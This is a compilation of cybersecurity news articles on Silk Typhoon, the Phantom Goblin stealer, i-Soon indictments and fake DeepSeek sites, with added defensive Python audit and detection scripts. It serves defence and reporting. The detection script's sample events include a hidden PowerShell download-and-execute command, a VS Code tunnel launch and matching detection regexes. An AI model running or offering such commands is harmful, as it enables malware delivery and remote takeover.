The Chinese espionage group known as Silk Typhoon has expanded its cyberattacks to target the global IT supply chain. Microsoft Threat Intelligence has identified a shift in the group's tactics, highlighting a new focus on commonly used IT solutions such as remote management tools and cloud applications. The group's strategic aim is to gain initial access to victim organizations, from which it infiltrates networks further and performs sophisticated espionage operations. Since 2020, Silk Typhoon has become one of the most formidable Chinese state-backed threat actors. Its activity shows a high level of resourcefulness and technical expertise, and it exploits vulnerabilities rapidly. Its tradecraft centers on discovering and leveraging zero-day vulnerabilities in IT infrastructure, particularly public-facing devices that remain unpatched. Its swift operational tempo and opportunistic approach make it one of the most active and dangerous cyber espionage groups in the world. While Microsoft has not yet observed Silk Typhoon targeting Microsoft cloud services directly, the group exploits unpatched software to elevate its access and extend its reach across organizational networks. Once a victim is compromised, the group gains access to sensitive information and tools and uses stolen credentials to abuse applications, some of them Microsoft services, to meet its espionage objectives.

Silk Typhoon Targets a Wide Range of Sectors

The scope of Silk Typhoon's attacks is expansive, covering information technology, defense, government, healthcare, energy, legal services, education, and non-governmental organizations (NGOs) across the globe. The attacks are not confined to any one region: Silk Typhoon has been observed targeting organizations both in the United States and internationally. Its activity suggests particular interest in sectors that hold sensitive data or play a critical role in global infrastructure. Its sophisticated understanding of cloud environments lets it move laterally through victim networks with ease. This capability helps the group maintain persistence, escalate privileges, and exfiltrate valuable data rapidly. Microsoft Threat Intelligence has tracked Silk Typhoon since 2020, providing crucial insight into the group's operational methods, which include using web shells to execute commands and maintain persistent access in compromised environments.

Compromise of IT Supply Chains

Recent research from Microsoft Threat Intelligence, based on activity observed since late 2024, reveals new tactics. The most significant change is the group's compromise of the IT supply chain: it uses stolen API keys and credentials to access third-party service providers, and those compromises give it a foothold in the providers' downstream customer environments. Targets have included privileged access management (PAM) vendors, cloud application providers, and cloud data management companies. Once inside via a stolen API key, Silk Typhoon performs reconnaissance on victim devices and harvests data, with a particular interest in information on U.S. government policy, law enforcement investigations, and legal processes of strategic value to China's geopolitical interests. Because a stolen API key keeps working after a password reset, providers hit this way need to rotate the keys as well. Other post-compromise activity includes resetting admin accounts, implanting web shells, creating new users, and clearing system logs to hide its tracks.

Password Spray and Abuse

In addition to exploiting software vulnerabilities, Silk Typhoon abuses weak password practices to gain access. The group has used password spray attacks, in which a few commonly used passwords are tried across many accounts to stay under lockout thresholds, and other password abuse techniques. It has also been observed conducting reconnaissance using publicly available data, such as leaked corporate passwords found in repositories on GitHub. Exploitation of unpatched vulnerabilities and abuse of weak or stolen credentials typically serve as the first step in Silk Typhoon's attack chain, granting initial access to victim environments. Once inside, the group moves laterally using compromised credentials and steals data from both on-premises and cloud systems. Notably, Silk Typhoon has been observed targeting Microsoft Entra Connect (formerly Azure AD Connect) servers, which synchronize on-premises Active Directory with Microsoft Entra ID (formerly Azure Active Directory). Because these servers hold credentials for both directories, compromising one lets the attackers escalate privileges and move between environments.

Cloud Environments and Data Exfiltration

A key aspect of Silk Typhoon's operations is infiltrating cloud environments. Once it has compromised an on-premises environment, the group escalates to the cloud by targeting service principals and OAuth applications that hold administrative permissions. With that access it steals email via the Microsoft Graph API and, in some cases, via Exchange Web Services (EWS). Silk Typhoon has also been seen creating Entra ID applications that mimic legitimate services in the environment, such as Office 365. These efforts are part of a broader strategy to exfiltrate data, move across tenants, and conduct further espionage without detection.

Conclusion

Silk Typhoon relies on a covert network (tracked by Microsoft as a CovertNetwork) of compromised edge devices, including Cyberoam appliances, Zyxel routers, and QNAP devices, to obfuscate its activity and keep a low profile while exfiltrating data from victim environments. As nations and organizations depend increasingly on cloud technologies and complex IT infrastructure, Silk Typhoon's ability to exploit these systems highlights the need for better defenses.
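Because the cloud-side abuse described above lives in ordinary-looking app registrations, a tenant audit is the practical check. The script below is an added example, not Microsoft's code or any tool the report mentions: it walks a list of service principals (shape loosely modelled on Microsoft Graph servicePrincipal objects, simplified so that appRoleAssignments are resolved permission names rather than appRoleId GUIDs) and flags look-alike names not owned by Microsoft, app-only permissions that read every mailbox or rewrite the directory, and credentials added within a recent window. The tenant data is constructed, and the first-party tenant ID constant is an assumption to confirm against your own directory.

```python
"""Audit service principals for the Silk Typhoon abuse patterns described above.

Added example, not Microsoft's code. Records loosely follow the Microsoft Graph
servicePrincipal shape but are simplified: appRoleAssignments are listed as
resolved permission names rather than appRoleId GUIDs, and the sample tenant
is constructed for this example.
"""
from datetime import datetime, timedelta, timezone

# Application (app-only) permissions that let an app read every mailbox or
# change the directory with no signed-in user: exactly what a backdoored
# OAuth app needs to pull email via Graph or EWS.
HIGH_RISK_APP_ROLES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "full_access_as_app",                     # EWS: every mailbox as the app
    "Directory.ReadWrite.All", "RoleManagement.ReadWrite.Directory",
    "Application.ReadWrite.All", "AppRoleAssignment.ReadWrite.All",
}
# Name fragments a look-alike app picks to blend in with first-party entries.
IMPERSONATED_NAMES = ("office 365", "microsoft", "exchange online", "graph")
# Tenant that owns Microsoft's own first-party apps. Assumed well-known value;
# confirm it against a known-good first-party service principal in your tenant.
MS_FIRST_PARTY_TENANT = "f8cdef31-a31e-4b4a-93e4-5f571e91255a"


def _ts(value):
    """Parse a Graph-style ISO-8601 timestamp such as 2025-03-03T10:00:00Z."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def audit_service_principal(sp, now, credential_window_days=30):
    """Return a list of finding tags for one service principal (empty = clean)."""
    findings = []
    name = sp.get("displayName", "").lower()
    if sp.get("appOwnerOrganizationId") != MS_FIRST_PARTY_TENANT and any(
        fragment in name for fragment in IMPERSONATED_NAMES
    ):
        findings.append("impersonates-first-party-name")

    risky = sorted(HIGH_RISK_APP_ROLES & set(sp.get("appRoleAssignments", [])))
    if risky:
        findings.append("high-risk-app-permissions:" + ",".join(risky))

    # A secret or certificate added recently to an existing app is the classic
    # sign of an attacker turning a legitimate registration into a backdoor.
    cutoff = now - timedelta(days=credential_window_days)
    creds = sp.get("passwordCredentials", []) + sp.get("keyCredentials", [])
    fresh = [c for c in creds if _ts(c["startDateTime"]) >= cutoff]
    if fresh:
        findings.append(f"credential-added-last-{credential_window_days}d:{len(fresh)}")
    return findings


def audit_tenant(service_principals, now, credential_window_days=30):
    """Map appId -> findings for every service principal that has any."""
    report = {}
    for sp in service_principals:
        findings = audit_service_principal(sp, now, credential_window_days)
        if findings:
            report[sp["appId"]] = findings
    return report


# Constructed sample tenant (not real data).
NOW = datetime(2025, 3, 6, tzinfo=timezone.utc)
SAMPLE_TENANT = [
    {   # genuine first-party entry: same kind of name, but owned by Microsoft
        "appId": "first-party-exo", "displayName": "Office 365 Exchange Online",
        "appOwnerOrganizationId": MS_FIRST_PARTY_TENANT,
        "appRoleAssignments": [], "passwordCredentials": [], "keyCredentials": [],
    },
    {   # look-alike registered in the victim tenant with a fresh secret
        "appId": "lookalike-sync", "displayName": "Office 365 Sync Service",
        "appOwnerOrganizationId": "victim-tenant-id",
        "appRoleAssignments": ["Mail.Read", "full_access_as_app"],
        "passwordCredentials": [{"startDateTime": "2025-03-03T10:00:00Z"}],
        "keyCredentials": [],
    },
    {   # ordinary line-of-business app with a modest permission
        "appId": "payroll-connector", "displayName": "Payroll Connector",
        "appOwnerOrganizationId": "victim-tenant-id",
        "appRoleAssignments": ["User.Read.All"],
        "passwordCredentials": [{"startDateTime": "2024-06-01T00:00:00Z"}],
        "keyCredentials": [],
    },
    {   # old but over-privileged app: still worth a look
        "appId": "backup-agent", "displayName": "Backup Agent",
        "appOwnerOrganizationId": "victim-tenant-id",
        "appRoleAssignments": ["Directory.ReadWrite.All"],
        "passwordCredentials": [],
        "keyCredentials": [{"startDateTime": "2024-01-15T00:00:00Z"}],
    },
]

if __name__ == "__main__":
    for app_id, findings in audit_tenant(SAMPLE_TENANT, NOW).items():
        print(app_id, "->", "; ".join(findings))
```

In a real tenant, pull the input with Get-MgServicePrincipal (including passwordCredentials and keyCredentials) and resolve app role assignments to permission names before feeding it in; the 30-day window is a tunable, not a threshold taken from the report.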
A new malware campaign named Phantom Goblin, identified and analyzed by Cyble, uses information-stealing malware delivered through social engineering to deceive victims and steal sensitive data, including browser credentials and cookies. The campaign is notable for its use of trusted tools and services like PowerShell and Visual Studio Code (VSCode), which help it evade traditional security mechanisms and establish covert, persistent remote access.

Key Insights into Phantom Goblin

Figure: Phantom Goblin infection chain (Source: Cyble)

Phantom Goblin primarily targets browsers and developer tools, using social engineering and malicious scripts to install and operate undetected. According to Cyble Research and Intelligence Labs (CRIL), the malware tricks users into executing a disguised LNK file, which then triggers a series of payloads designed to extract and exfiltrate sensitive data.

Social Engineering and Initial Infection: Distribution typically begins with a deceptive RAR archive containing a malicious LNK file. The file is named to resemble a legitimate document, such as a PDF, prompting users to open it. When executed, the LNK file runs a PowerShell script that silently downloads additional payloads from a GitHub repository. The script also establishes persistence by adding itself to the Windows registry so that the malware runs each time the system restarts.

Browser Credential and Cookie Theft: Once installed, Phantom Goblin turns to web browsers to extract cookies and login credentials. Rather than exploiting a vulnerability, it sidesteps Chrome's App Bound Encryption (ABE) by forcibly terminating the running browser and relaunching it with remote debugging enabled, which lets the malware read the decrypted cookies through the browser's own debugging interface without triggering user alerts.

Use of Visual Studio Code (VSCode) Tunnels

One of the standout features of Phantom Goblin is its ability to establish unauthorized remote access to infected systems. The malware deploys a binary named "vscode.exe" that creates a Visual Studio Code tunnel on the compromised machine. This allows the attackers to control the system remotely over Microsoft's legitimate tunnel service, so the traffic looks like ordinary developer activity and bypasses traditional security mechanisms.

Stealthy Exfiltration via Telegram

Phantom Goblin exfiltrates stolen information, including cookies, credentials, and browsing history, through Telegram's Bot API to a remote Telegram channel. Because the data travels over HTTPS to a legitimate and widely allowed service, the exfiltration blends in with normal traffic while the malware keeps running on the compromised machine.

Persistence and Evasion Tactics

The attackers take care that the malware stays undetected and persists on infected systems. Its payloads are named to look like legitimate software, such as "updater.exe" or "browser.exe", which complicates detection by traditional security tools. Using trusted services like GitHub and PowerShell to fetch additional payloads makes it harder for antivirus software to flag the activity as malicious.

Infection Chain and Malicious Payloads

Figure: Malicious LNK file (Source: Cyble)

The infection begins with an email carrying a RAR attachment that houses the malicious LNK file. Upon execution, the LNK file triggers the PowerShell script, which downloads and runs additional payloads:

- updater.exe: steals cookies from popular browsers such as Chrome, Edge, and Brave by terminating the browser processes and enabling remote debugging to bypass App Bound Encryption (ABE). The extracted cookies are archived and sent to the attacker's Telegram bot.
- vscode.exe: establishes a VSCode tunnel, giving the attackers remote access to the infected system. The malware manipulates VSCode's legitimate update process to maintain cover, keeping a hidden backdoor into the victim's machine.
- browser.exe: gathers browsing history, login credentials, and session data from a wide range of browsers, so that a broad swath of personal data is collected from the victim's system.

Defense Against Phantom Goblin

To protect systems from Phantom Goblin and similar threats, experts recommend several practices:

- Email filtering: Block suspicious attachments, particularly RAR, ZIP, and LNK files, and scan all attachments with up-to-date antivirus software before they are opened.
- Restricting VSCode tunnels: Limit Visual Studio Code tunneling to authorized users through access controls and authentication; restricting where VSCode can run on sensitive systems helps prevent this form of remote access.
- PowerShell restrictions: Disable or restrict PowerShell and script execution unless it is needed, and monitor for suspicious PowerShell activity such as scripts fetched from external repositories.
- Browser security: Prevent unauthorized debugging of browsers and restrict access to the sensitive data they store; multi-factor authentication (MFA) and session timeouts further limit what stolen browser credentials and cookies are worth to an attacker.
- Endpoint protection: Deploy endpoint protection with real-time detection of malicious processes, registry changes, and unusual file downloads.

Conclusion

Phantom Goblin highlights how cybercriminals use social engineering and trusted tools to bypass security measures and steal sensitive data. By abusing browser debugging features and developer tooling, and using Visual Studio Code tunnels for remote access, the attackers stay undetected and persistent. Cyble's products, including Cyble Vision and Cyble Hawk, provide AI-driven threat intelligence and proactive security measures to help organizations detect, prevent, and respond to threats like Phantom Goblin.
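The chain described above maps onto a handful of telemetry conditions. As an added example (not Cyble's code, and not the malware itself), the Python below runs those conditions over constructed Sysmon-style process, registry and network events: Explorer spawning a hidden PowerShell downloader, a Run key pointing into a user-writable folder, a browser relaunched with a remote-debugging port, a VS Code binary started in tunnel mode, and a non-browser process reaching the Telegram Bot API. The paths, the GitHub URL and the rule IDs are placeholders.

```python
"""Detection logic for the Phantom Goblin chain described above, run over
constructed process/registry/network telemetry in the style of Sysmon or EDR
events. Added example, not Cyble's code; the events and paths are made up for
the example and the rule IDs (PG-1 .. PG-5) are arbitrary labels."""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
VSCODE_BINARIES = {"code.exe", "vscode.exe", "code-tunnel.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
HIDDEN_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-e(xecutionpolicy|p)\s+bypass", re.I)
DOWNLOAD_PRIMITIVES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (rule_id, description) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        kind = ev["type"]
        if kind == "process":
            image = _basename(ev["image"])
            parent = _basename(ev.get("parent_image", ""))
            cmd = ev.get("command_line", "")
            # PG-1: a double-clicked LNK makes Explorer the parent of a hidden
            # PowerShell that fetches a second stage from the internet.
            if (image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe"
                    and HIDDEN_FLAGS.search(cmd) and DOWNLOAD_PRIMITIVES.search(cmd)):
                hits.append(("PG-1", "hidden PowerShell downloader spawned by Explorer"))
            # PG-3: VS Code (or a binary posing as it) started in tunnel mode.
            if image in VSCODE_BINARIES and re.search(r"\btunnel\b", cmd, re.I):
                hits.append(("PG-3", f"VS Code tunnel started by {image}"))
            # PG-4: browser relaunched with the DevTools port open, the lever used
            # to read cookies without attacking App Bound Encryption directly.
            if image in BROWSERS and "--remote-debugging-port" in cmd.lower():
                hits.append(("PG-4", f"{image} started with remote debugging"))
        elif kind == "registry":
            # PG-2: Run-key persistence pointing into a user-writable directory.
            if ("\\currentversion\\run" in ev["key"].lower()
                    and any(p in ev["data"].lower() for p in USER_WRITABLE)):
                hits.append(("PG-2", f"Run key {ev['value_name']} -> {ev['data']}"))
        elif kind == "network":
            # PG-5: Telegram Bot API reached by something that is not a browser.
            if (ev["dest_host"].lower().endswith("api.telegram.org")
                    and _basename(ev["image"]) not in BROWSERS):
                hits.append(("PG-5", f"{_basename(ev['image'])} contacted api.telegram.org"))
    return hits


def rule_ids(events):
    """Just the ordered list of rule IDs that fired, convenient for triage."""
    return [rule for rule, _ in evaluate(events)]


# Constructed telemetry (not from a real incident); the GitHub URL is a placeholder.
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -c \"iex (New-Object Net.WebClient)"
                     ".DownloadString('https://raw.githubusercontent.com/example/repo/main/stage2.ps1')\""},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Updater", "data": r"C:\Users\victim\AppData\Roaming\updater.exe"},
    {"type": "process", "parent_image": r"C:\Users\victim\AppData\Roaming\updater.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": "chrome.exe --remote-debugging-port=9222 --headless"},
    {"type": "process", "parent_image": r"C:\Users\victim\AppData\Roaming\updater.exe",
     "image": r"C:\Users\victim\AppData\Roaming\vscode.exe",
     "command_line": "vscode.exe tunnel --accept-server-license-terms --name host1"},
    {"type": "network", "image": r"C:\Users\victim\AppData\Roaming\updater.exe",
     "dest_host": "api.telegram.org"},
    # Benign activity that must not fire: a developer opening VS Code, and a
    # browser visiting Telegram's site.
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\victim\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "command_line": r'"Code.exe" C:\src\project'},
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "api.telegram.org"},
]

if __name__ == "__main__":
    for rule, description in evaluate(SAMPLE_EVENTS):
        print(rule, description)
```

The benign events at the end show the two false-positive traps: developers launch Code.exe all day, and a browser visiting api.telegram.org is normal, so the VS Code rule keys on the tunnel argument and the Telegram rule on the process image, not on the destination alone.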
The United States Department of Justice (DOJ) has taken action against a major cyber threat, unsealing indictments against 12 Chinese nationals, including two officers of China's Ministry of Public Security (MPS) and several employees of the Chinese technology firm i-Soon. The move is part of a coordinated effort to stop global cybercrime and protect critical U.S. infrastructure from foreign attacks.

Crackdown on Cybercrime

On Wednesday, the DOJ announced charges against Zhou Shuai, Yin Kecheng, and eight employees of i-Soon, a company alleged to have carried out hacking operations for the Chinese government. According to the U.S. government, these individuals took part in hacking campaigns targeting key sectors such as defense, healthcare, communications, and government agencies. Alongside the indictments, the U.S. government imposed sanctions on Zhou Shuai and his company, Shanghai Heiying Information Technology Company. Zhou is accused of illegally obtaining and selling sensitive data from U.S. infrastructure networks. State Department spokesperson Tammy Bruce said Zhou's actions put national security at risk and violated international norms on cyber activity.

Hacker-for-Hire Operations Exposed

The indictments shed light on China's extensive hacker-for-hire ecosystem, which allegedly operates under the direction of the MPS and the Ministry of State Security (MSS). The DOJ, the Federal Bureau of Investigation (FBI), the Naval Criminal Investigative Service (NCIS), and the Departments of State and Treasury collaborated to expose these operations. According to court documents, the accused hackers carried out intrusions for profit, either on their own initiative or at the behest of Chinese intelligence agencies. Their targets included U.S. critics of the Chinese Communist Party (CCP), a religious organization in the U.S., foreign ministries of Asian governments, and multiple American federal and state agencies, including the U.S. Department of the Treasury. Assistant Director Bryan Vorndran of the FBI's Cyber Division stated, "The FBI is committed to protecting Americans from foreign cyber-attacks. Today's announcements reveal that the Chinese Ministry of Public Security has been paying hackers-for-hire to inflict digital harm on Americans who criticize the Chinese Communist Party."

The Scope of Cyber Intrusions

The DOJ's investigation revealed an extensive network of private companies and contractors in China engaged in state-sponsored hacking. These entities worked to obscure the PRC government's involvement while conducting intrusions, stealing information, and selling it for profit. The hackers often targeted victims indiscriminately, and the stolen data was either handed to Chinese government agencies or sold to third parties, compounding the security risk. This reckless approach not only violated privacy rights but also left countless systems exposed to future attacks.

Indictments and Arrest Warrants

In the Southern District of New York, federal prosecutors unsealed indictments against eight i-Soon employees and two MPS officers for conducting cyberattacks from 2016 to 2023. The DOJ also seized i-Soon's primary internet domain, disrupting the company's operations. Acting U.S. Attorney Matthew Podolsky for the Southern District of New York highlighted the severity of the charges, stating, "For years, these 10 defendants—including two PRC officials—used sophisticated hacking techniques to target religious organizations, journalists, and government agencies. These charges will help stop these state-sponsored hackers and protect our national security." The FBI has issued arrest warrants for the indicted individuals, who remain at large. In parallel, the U.S. Department of State's Rewards for Justice (RFJ) program announced a reward of up to $10 million for information leading to the identification or location of individuals engaged in malicious cyber activities on behalf of a foreign government.

The ten wanted individuals are:

- Wu Haibo (CEO of i-Soon)
- Chen Cheng (COO of i-Soon)
- Wang Zhe (Sales Director)
- Liang Guodong, Ma Li, Wang Yan, Xu Liang, Zhou Weiwei (technical staff)
- Wang Liyu, Sheng Jing (MPS officers)

The defendants are accused of generating millions of dollars in revenue from their hacking services. i-Soon allegedly charged between $10,000 and $75,000 per successfully exploited email account and trained Chinese government officials in intrusion techniques.

Targeted Organizations and Global Impact

The indictment says i-Soon targeted organizations critical of the Chinese government, including:

- A large U.S.-based religious organization previously active in China
- U.S. news outlets critical of the CCP
- The New York State Assembly
- Human rights and religious freedom organizations
- Foreign ministries in Taiwan, India, South Korea, and Indonesia
- A Hong Kong-based newspaper opposed to the Chinese government

These attacks affected not only the United States but also had a significant global impact, raising concern among international allies about China's cyber operations.

Actions Against APT27 Group

In a separate indictment unsealed in the District of Columbia, Yin Kecheng and Zhou Shuai were charged over a decade-long hacking campaign linked to the threat group Advanced Persistent Threat 27 (APT27). The FBI has issued wanted posters for both individuals, who remain in China. The U.S. Department of State's Bureau of International Narcotics and Law Enforcement Affairs has announced rewards of up to $2 million for information leading to their arrests. Interim U.S. Attorney Edward R. Martin Jr. for the District of Columbia remarked, "These indictments show our commitment to holding Chinese hackers accountable. The defendants have been hacking for the Chinese government for years, and we demand that the PRC stop protecting these cybercriminals."
As cyber threats continue to evolve, experts believe that governments worldwide must take proactive steps to address vulnerabilities and hold malicious actors accountable. The latest indictments mark a major step in the fight against state-sponsored cybercrime, sending a clear message that the U.S. will not tolerate foreign-backed hacking operations.
In early 2025, the Chinese chatbot DeepSeek burst onto the AI scene. It provoked much comment and controversy across the globe: we could hardly fail to spot the similarity of its logo to our own, comparisons with ChatGPT were abundant, and in Italy, South Korea, Australia, and other countries, DeepSeek was blocked altogether. The hype was, and remains, intense, including among cybercriminals. We've discovered several groups of sites mimicking the official chatbot website and distributing malicious code under the guise of what appears to be a legitimate client. To find out exactly how these cybervillains operate, and how to use AI safely, read on.

Malicious scripts and geofencing

Several malware distribution schemes were detected, all with fake DeepSeek websites as the common denominator. The difference lies in what was distributed through these sites and how. This post explores one of these schemes in detail; for the others, see our full report on Securelist.

What would you think if you landed on a website with the domain deepseek-pc-ai[.]com or deepseek-ai-soft[.]com? You'd probably assume you could find some DeepSeek-related software there. And what kind of software might that be? A DeepSeek client, of course! And indeed, you'll quickly see the bright Download and slightly duller Start Now buttons that greet visitors to the site.

Figure: Fake DeepSeek web page

Whichever of these buttons you click, an installer starts downloading. But there's a catch: once launched, instead of installing DeepSeek, the installer contacts malicious URLs and runs scripts that enable the Windows OpenSSH service and configure it to accept the attackers' keys. This lets them connect to the victim's computer remotely, and the victim doesn't even get a DeepSeek Windows client as consolation, which, by the way, doesn't exist.

Interestingly, the fake sites use geofencing, restricting content by the region of the visitor's IP address. Users from Russia, for example, saw a plain stub site with empty texts about DeepSeek, most likely generated by DeepSeek itself or another large language model. Visitors from other countries were taken to the malicious site distributing the fake client.
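After an installer of this kind has run, the question is which keys the now-enabled OpenSSH server trusts. As an added example (not Kaspersky's code), the Python below parses an authorized_keys file, computes OpenSSH-style SHA256 fingerprints and reports every key that is not on an allowlist; the keys and the file content are constructed for the example and are not real key material. On Windows, keys that grant access to members of the Administrators group live in C:\ProgramData\ssh\administrators_authorized_keys, and per-user keys in %USERPROFILE%\.ssh\authorized_keys.

```python
"""Audit an OpenSSH authorized_keys file for keys that are not on an allowlist,
the check to run after an installer like the fake DeepSeek client has turned on
the Windows OpenSSH service. Added example, not Kaspersky's code; the key
material and file below are constructed (not real keys)."""
import base64
import hashlib
import struct

KEY_TYPES = {
    "ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com",
    "sk-ecdsa-sha2-nistp256@openssh.com",
}


def _ssh_string(data):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def ed25519_blob(public_key):
    """Base64 key blob as it appears in authorized_keys (type string + 32-byte key)."""
    return base64.b64encode(_ssh_string(b"ssh-ed25519") + _ssh_string(public_key)).decode()


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint, padding stripped as ssh-keygen -l prints it."""
    raw = base64.b64decode(blob_b64, validate=True)
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")


def _embedded_type(raw):
    """Key type string stored inside the blob; it must match the declared type."""
    if len(raw) < 4:
        return None
    (length,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + length].decode(errors="replace") if len(raw) >= 4 + length else None


def parse_line(line):
    """Split one authorized_keys line into options / type / blob / comment.

    Returns None for blank and comment lines, and a dict with status
    "malformed" when the line cannot be a valid key entry. Options that
    contain spaces inside quotes are not handled (rare in practice)."""
    text = line.strip()
    if not text or text.startswith("#"):
        return None
    tokens = text.split()
    type_index = next((i for i, tok in enumerate(tokens) if tok in KEY_TYPES), None)
    if type_index is None or type_index + 1 >= len(tokens):
        return {"status": "malformed", "raw": text}
    key_type, blob = tokens[type_index], tokens[type_index + 1]
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return {"status": "malformed", "raw": text}
    if _embedded_type(raw) != key_type:
        return {"status": "malformed", "raw": text}
    return {
        "status": "parsed",
        "options": " ".join(tokens[:type_index]),
        "type": key_type,
        "fingerprint": fingerprint(blob),
        "comment": " ".join(tokens[type_index + 2:]),
        "raw": text,
    }


def audit(file_text, allowed_fingerprints):
    """Classify every key entry as allowed, UNKNOWN (investigate) or malformed."""
    report = []
    for number, line in enumerate(file_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue
        entry["line_no"] = number
        if entry["status"] == "parsed":
            entry["status"] = "allowed" if entry["fingerprint"] in allowed_fingerprints else "UNKNOWN"
        report.append(entry)
    return report


# Constructed sample: a known admin key, a planted key with forced-command
# options, and a corrupt line. Neither key is real.
ADMIN_PUB = bytes(range(32))
ROGUE_PUB = bytes([0x42]) * 32
SAMPLE_FILE = "\n".join([
    "# C:\\ProgramData\\ssh\\administrators_authorized_keys (constructed)",
    f"ssh-ed25519 {ed25519_blob(ADMIN_PUB)} admin@corp-laptop",
    f'no-pty,command="cmd.exe" ssh-ed25519 {ed25519_blob(ROGUE_PUB)} update',
    "ssh-ed25519 not*base64 broken",
])
ALLOWLIST = {fingerprint(ed25519_blob(ADMIN_PUB))}

if __name__ == "__main__":
    for entry in audit(SAMPLE_FILE, ALLOWLIST):
        print(entry["line_no"], entry["status"], entry.get("fingerprint", entry["raw"]))
```

Compare the fingerprints it prints with ssh-keygen -lf on a key you trust; an UNKNOWN entry carrying a forced command or no-pty option is a strong sign it was planted, and the service itself should be checked with Get-Service sshd and disabled if nobody deliberately enabled it.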
A million views on X

The main vector for distributing links to the malicious URLs was posts on the social network X (formerly Twitter). One of the most popular posts (now deleted) was published from the account of Australian startup Lumina Vista, which, according to open sources, has no more than 10 employees. The company's account is in its infancy: it only got the coveted blue check-mark in February 2025, and boasts just a dozen posts and fewer than 100 followers. Yet the post promoting the fake DeepSeek site garnered 1.2 million views and more than 100 reposts. A bit fishy? We investigated the accounts that reposted it and concluded that they could be bots, since all use the same naming convention and identifiers in the bio section. Incidentally, it's quite possible that Lumina Vista's account was simply hacked and used for paid promotion of the attackers' ad post.

Figure: 1.2 million views in a near-empty account? Smells like paid promotion

In the comments, some users pointed out that the link leads to a malicious site, but they were in the minority; the rest were simply expressing views about DeepSeek, Grok, and ChatGPT. None of the commenters noted the obvious: DeepSeek has no native client for Windows, and you can only access it in a browser. You can also run DeepSeek locally, but that requires specialized software.

How to use AI safely

At present, it's not easy to assess the scale of this and other malicious schemes involving fake DeepSeek pages. But one thing is certain: these campaigns are massive and not targeted at specific users. They're also developing very quickly: soon after the announcement of Grok-3, attackers began offering to download its client both from the domain v3-grok[.]com and from v3-deepseek[.]com! Grok, DeepSeek, what's the difference? Without reliable protection, any AI enthusiast is at risk. That's why it's vital to follow these safety rules when using AI.

Check the URLs of websites you visit. Especially when it's something new, popular, and easy to spoof.

Filter sensitive data. Remember that what you write to a chatbot could be used against you: as with other cloud services, data can leak due to security flaws or account hacking.

Protect your devices. Check the reviews and choose the solution that suits you best and that will spot phishing sites and guard against downloading malware.

Limit the use of third-party plugins. Every add-on creates new risks. Execution plug-ins that can, for example, run code to buy a plane ticket at your expense need special monitoring.

If you're seriously interested in neural networks and want to learn how to use them safely, check out these posts:

- How to use ChatGPT, Gemini, DeepSeek and other AI securely
- How to install and use an AI assistant on your computer
- How hackers can read your chats with ChatGPT or Microsoft Copilot

... and many others.
YouTube creators are being targeted by scammers seeking out their credentials, using deepfake tactics to lure them in with a false sense of legitimacy.
Recently, 57 countries signed an agreement pledging an "open" and "inclusive" approach to AI's development. The US and UK were not among them, with the US vice president implying productivity should be the priority over safety. Should the opportunity for AI to drive innovation and productivity be prioritized over safety and security?
Many women are finding that they are unhappy in their cybersecurity roles, largely due to the layoffs their companies are experiencing, cutbacks, and return to in-office work policies.
The threat actor, of unknown origin, is deploying a proprietary backdoor malware known as "Sagerunex" against critical infrastructure in Hong Kong, Philippines, Taiwan, and Vietnam.
The US Justice Department on Wednesday announced charges against members of the Chinese-backed i-Soon "secret" APT and APT27, the latter implicated in January's Treasury breach.
As CISOs take a seat at the boardroom table, the focus shifts from stacking security tools to driving accountability, efficiency, and strategic risk management.
Cybercriminals are ramping up their efforts in the Kingdom and targeting more than just petroleum firms; now, they're aiming for Middle East organizations in the IT, government, construction, and real estate sectors too.
A December 2024 cyberattack on a prominent administrator for retirement plans has exposed the information of thousands of public school teachers and employees across the U.S.
Two people were arrested in New York City after allegedly using backend access to StubHub’s system to steal the URLs for 900 concert tickets, most of which were for Taylor Swift’s popular Eras Tour.
Russia's FSB security agency said Ukrainian military intelligence hacked into the Kremlin-backed youth organizations Avangard and Yunarmiya to collect personal data on teenagers for recruitment for intelligence and sabotage activities against Russia.
Russian cryptocurrency exchange Garantex was taken down in an apparent seizure by U.S. and European law enforcement Thursday, shortly after the company said $28 million had been frozen by another cryptocurrency firm.
The U.S. Department of Justice (DoJ) has announced charges against 12 Chinese nationals for their alleged participation in a wide-ranging scheme designed to steal data and suppress free speech and dissent globally. The individuals include two officers of the People's Republic of China's (PRC) Ministry of Public Security (MPS), eight employees of an ostensibly private PRC company, Anxun
Over 1,000 websites powered by WordPress have been infected with a third-party JavaScript code that injects four separate backdoors. "Creating four backdoors facilitates the attackers having multiple points of re-entry should one be detected and removed," c/side researcher Himanshu Anand said in a Wednesday analysis. The malicious JavaScript code has been found to be served via cdn.csyndication[
